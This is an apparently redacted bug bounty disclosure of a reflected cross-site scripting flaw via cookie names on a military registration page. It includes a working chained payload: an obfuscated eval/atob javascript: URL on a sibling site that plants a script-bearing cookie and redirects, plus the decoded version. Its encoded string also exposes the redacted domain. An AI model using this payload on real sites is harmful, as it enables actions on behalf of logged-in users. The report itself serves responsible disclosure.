[HTAF4-213] [Pre-submission] XSS via arbitrary cookie name at the https://www2.██████/nssi/core/dot_stu_reg/Registration.aspx

##Description We identified XSS via cookie name on the `https://www2.███████/nssi/core/dot_stu_reg/Registration.aspx` endpoint. The first cookie name is getting reflected on the page without sanitization: █████ ##POC (you can use Chrome Incognito mode for clear experiment) To trigger XSS on the https://www2.██████████/nssi/core/dot_stu_reg/Registration.aspx we used XSS on the different .████.mil property, to set the cookie to the `.███.mil` which can be visible from the `www2.████`, and then do redirect to the vulnerable endpoint: ``` https://███████.███████.mil/kc/main/pop_up_frm.asp?loc=javascript:top[%27ev%27+%27al%27](atob(%27ZG9jdW1lbnQuY29va2llPSd6eno8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD49enp6O3BhdGg9Lztkb21haW49LmFmLm1pbCc7IHdpbmRvdy50b3AubG9jYXRpb24uaHJlZiA9ICdodHRwczovL3d3dzIucGV0ZXJzb24uYWYubWlsL25zc2kvY29yZS9kb3Rfc3R1X3JlZy9SZWdpc3RyYXRpb24uYXNweCc7%27)) ``` The plain payload: ``` document.cookie='zzz<script>alert(document.domain)</script>=zzz;path=/;domain=.████.mil'; window.top.location.href = 'https://www2.███████/nssi/core/dot_stu_reg/Registration.aspx'; ``` The result: ██████████ Video: ████████ ##Suggested fix We feel there is no need to reflect cookies, generic error message should be more than enough. ## Impact Reflected XSS. The `https://www2.█████████/nssi/` has authenticated experience, such as login/registration/manage endpoints for courses users, and it can be used for interactions on their behalf.